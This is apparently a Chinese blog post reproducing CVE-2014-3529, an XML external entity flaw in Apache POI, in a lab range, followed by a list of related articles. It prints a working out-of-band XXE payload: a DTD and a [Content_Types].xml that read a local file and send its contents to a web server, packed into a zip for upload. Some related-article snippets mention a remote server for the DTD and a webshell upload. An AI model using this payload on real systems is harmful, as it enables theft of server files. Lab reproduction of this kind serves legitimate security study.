[漏洞复现]Apache POI < 3.10.1 XXE(CVE-2014-3529)

最新推荐文章于 2025-05-29 08:54:53 发布
原创 最新推荐文章于 2025-05-29 08:54:53 发布 · 2.6k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #apache #安全

本文详细描述了ApachePOI3.10.1版本中的XXE漏洞,涉及通过OpenXML文件进行远程攻击,提供漏洞复现步骤,包括创建特定文件和使用Python开启web服务。最后给出安全处置建议。
部署运行你感兴趣的模型镜像

一、漏洞情况分析

Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。

二、漏洞复现

春秋云境.com

进入靶场

准备文件和环境

创建一个[Content_Types].xml文件和xxe.dtd文件注意名字不可修改

###xxe.dtd###

<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://127.0.0.1/%file;'>">
%all;

###[Content_Types].xml###
<!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///flag"> 
<!ENTITY % dtd SYSTEM "http://127.0.0.1/xxe.dtd">
%dtd; %send;]>

[Content_Types].xml文件压缩成zip包,名字任意

 使用python开启一个web服务

 开始复现

三、漏洞处置建议 

难受三天,今天睡个好觉。把靶场关了,跟漏洞说“白白吧”

您可能感兴趣的与本文相关的镜像

Stable-Diffusion-3.5

Stable-Diffusion-3.5

图片生成
Stable-Diffusion

Stable Diffusion 3.5 (SD 3.5) 是由 Stability AI 推出的新一代文本到图像生成模型,相比 3.0 版本,它提升了图像质量、运行速度和硬件效率

大华智慧园区poi任意文件上传漏洞(企业及时修复)
2301_80127209的博客
04-09 538
还是老规矩,fofa先上fofa指纹:body=”/WPMS/asset/lib/gridster/“主站页面如下上pocPOC文字版传了马以后直接访问文字路径:/upload/马子.jsp。
Apache2-XXE漏洞渗透
一纸荒芜的博客
07-04 5562
Apache2 Ubuntu Default Page XXE漏洞渗透
CVE-2014-3529
守拙的博客
02-28 5573
一、 漏洞影响 poi-ooxml3.10及以下 二、环境搭建 1. 漏洞环境使用大佬的java靶场:https://github.com/JoyChou93/java-sec-code.git。在C盘下新建1.txt,文件内容为success,用于演示文件读取 2. 使用python起一个web服务用来加载远程dtd文件,在web服务目录下放置一个xxe.dtd <!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://192.168.
Apache POI 3.10.1外部实体漏洞CVE-2014-3529
qq_23003811的博客
07-29 792
然后到[Content_Types].xml进行压缩为zip文件,得到[Content_Types].zip。最后是重命令[Content_Types].zip为[Content_Types].xlsx。1、修改[Content_Types].xml中的file:///flag达到任意文件读取。1、准备一台vps服务器IP为91.208.73.100,上传xxe.dtd到服务器上。3、制作payload,[Content_Types].xlsx。4、在页面上传[Content_Types].xlsx。
[漏洞复现]Apache POI3(2),网络安全面试必问
2401_84185471的博客
04-10 519
Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!创建一个**[Content_Types].xml文件和xxe.dtd文件注意名字不可修改**因篇幅有限,仅展示部分资料。
[春秋云镜]CVE-2014-3529
niubi707的博客
11-30 3265
[春秋云镜]CVE-2014-3529 Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。
Apache POI < 4.1.0 XSSFExportToXml XXE漏洞
weixin_42256126的博客
01-20 4155
Apache POI < 4.1.0 XSSFExportToXml XXE漏洞
poi-3.10.1jar包
09-12
poi-3.10.1jar包 poi-3.10.1jar包 poi-3.10.1jar包 poi-3.10.1jar包 poi-3.10.1jar包 poi-3.10.1jar包 poi-3.10.1jar包
poi-3.10.1上传组件jar包 po poi-ooxml poi-ooxml-schemas
10-27
1. poi-3.10.1.jar:这是Apache POI的主要库,包含了处理HSSF(旧版的Excel格式)和XSSF(XML格式的Excel)的核心功能。它提供了API来操作单元格、行、工作表等Excel元素,以及创建新的工作簿、读取现有工作簿、写入...
poi-3.12-android-a.jar和poi-ooxml-schemas-3.12-20150511-a.jar
05-06
poi-3.12-android-a.jar 和 poi-ooxml-schemas-3.12-20150511-a.jar 是Apache POI项目的特定版本的库文件,专门设计用于在Android平台上处理Microsoft Office文档,尤其是Excel文件。 poi-3.12-android-a.jar: 这是...
漏洞复现CVE-2017-12616
Blood_Pupil的博客
03-25 4347
FROM ubuntu apt-get updat&amp;amp;&amp;amp;apt-get install wget&amp;amp;&amp;amp; wget https://archive.apache.org/dist/tomcat/tomcat-7/v7.0.75/bin/apache-tomcat-7.0.75.tar.gz&amp;amp;&amp;amp;tar zxvf apache-tomcat-7.0.75.ta...
Apache POI 安全漏洞
weixin_44778952的博客
11-12 2603
漏洞来源 http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201910-1431 漏洞详情 Apache POI是美国阿帕奇(Apache)软件基金会的一个开源函数库,它提供API给Java程序可对Microsoft Office格式档案进行读和写。 Apache POI 4.1.0及之前版本中存在代码问题漏洞。攻击者可借助特制的文档利用该漏洞读取本地文件系统中或网络资源中的文件。 参考资料 来源:lists.apache.org 链接:ht
[20][03][06] Apache POI 安全漏洞(CVE-2019-12415)
安全新司机
12-21 8305
文章目录1. 描述2. 场景3. 漏洞复现3.1 引入 apache poi 组件 4.1.0 版本3.2 下载测试用例 excel3.3 制作恶意 excel3.4 测试代码4. 修复方案 1. 描述 Apache POIApache 的一个开源函数库,它提供API给Java程序可对 Excel 进行读和写操作的组件 poi 组件存在以下 CVE 2. 场景 此次要分析的是 CVE-2019-12415 Apache POI 版本 <= 4.1.0 中,当使用 XSSFExportToXml
解决Apache POI 代码问题漏洞时,缺少类的问题 (CTPageMar 等)
Oxye
04-17 4237
目录问题代码漏洞告警寻找高版本解决方案一:根据告警提示替换依赖更新依赖步骤解决方案二:把缺少的类从旧包拷到本地解决方案三:终于找到靠谱的依赖总结 问题 先把问题放这 代码漏洞告警 昨天项目代码被检测到POI高危漏洞 漏洞级别:高危漏洞名称:Apache POI 代码问题漏洞 漏洞介绍 Apache POI是美国阿帕奇(Apache)软件基金会的一个开源函数库,它提供API给Java程序可对Microsoft Office格式档案进行读和写。 Apache POI 4.1.0及之前版本中存在安全漏洞。攻击者
POI解析excel的漏洞CVE-2014-3574)
06-02 1009
一、概述 最早的时候,java开发人员在操作excel的时候,用的最多的框架应该是poi、jxl。随着office的不断发展,office2007开始支持openXML的协议,后续陆续出现了新的框架支持操作office,如docx4j等。openXML使得数据的结构、组成更加透明,可...
Poi HSSFCellStyle.ALIGN_CENTER VERTICAL_CENTER 等爆红的解决办法
Tongyao
05-31 4067
Apache POI是画excel工具,大家在接收旧代码时会出现以下问题: HSSFCellStyle.ALIGN_CENTER HSSFCellStyle.VERTICAL_CENTER 等爆红 原因是版本出错: <dependency> <groupId>org.apache.poi</groupId> <artifactId>poi-ooxml</artifactId> <version>4.1.2<
CVE-2014-3529-xxe任意文件读取
qq_30890029的博客
04-21 464
Content_Types].xml通过压缩工具压缩成[Content_Types].zip。将[Content_Types].zip命名为xxe.xlsx。vps开启服务 /在目录下放置一个xxe.dtd文件。命名:[Content_Types].xml。编写一个payload。4:查看log响应日志。
Apache POI 5.4.0解析伪造ZIP文件的安全风险分析
最新发布
qq_44901855的博客
05-29 1292
此外,CVE-2019-12415漏洞POI 4.1.1前存在,当使用XSSFExportToXml类将xlsx转换为xml时,若第三个参数为true,会进入isValid方法触发XXEApache POI 5.4.0版本在解析XLSX文件时存在多种安全风险,特别是当文件是伪造的ZIP文件时,攻击面显著扩大。压缩炸弹(Zip Bomb)是一种特殊的恶意ZIP文件,其特点是压缩率极高,一个小的压缩文件解压后会生成极大的未压缩文件,可能导致服务器内存耗尽或磁盘空间被占满,引发服务崩溃。
excel 导入数据,xxe 注入 poi 3.15
u011820505的博客
04-27 2612
问题:xxe是xml为载体,xlsx就是含有xml的 构造的是一个带有攻击代码的xlsx文件,里面带有一个我自定义的域名,后台解析后,访问了我指定的这个域名,说明注入成功 解决: poi之前是3.9 升级到3.15以上 所需jaroftenUsed ('org.apache.poi:poi:3.17') { transitive = false } ...
Apache POI-3.10.1版本jar包助力Java导出Word/Excel文档
总结来说,Apache POI库对于需要在Java应用程序中处理Microsoft Office文件的开发者来说是一个非常宝贵的工具,特别是在POI-3.10.1版本中,它提供了稳定和成熟的功能来读取、创建和修改Office文档。通过上述的知识点...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值